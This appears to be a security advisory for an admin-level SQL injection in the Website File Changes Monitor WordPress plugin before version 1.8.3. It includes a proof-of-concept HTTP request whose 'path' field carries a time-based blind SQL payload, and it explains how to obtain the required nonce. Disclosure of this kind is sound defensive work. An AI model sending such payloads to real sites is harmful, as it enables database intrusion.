Website File Changes Monitor < 1.8.3 - Admin+ SQLi

The plugin does not sanitise and escape user input before using it in a SQL statement via an action available to users with the manage_options capability (by default admins), leading to an SQL injection

PoC

A user with manage_options permission can exploit the vulnerability with the following request : DELETE /wp-json/website-file-changes-monitor/v1/mark-read-dir HTTP/1.1 Host: 127.0.0.1 X-WP-Nonce: 5732d8605b Cookie: [redacted] Content-Type: application/json Content-Length: 54 {“path”:“a’-(SELECT 1 FROM (SELECT(SLEEP(5)))SQLi)-'”} The nonce required for the header “X-WP-Nonce” can be found in the source code of the page /wp-admin/admin.php?page=wfcm-file-changes, at the following line : var wfcmData = {“restNonce”:“5732d8605b”,“restAdminEndpoint”:“http://127.0.0.1/wp-json/website-file-changes-monitor/v1/admin-notices”,“adminAjax”:“http://127.0.0.1/wp-admin/admin-ajax.php”};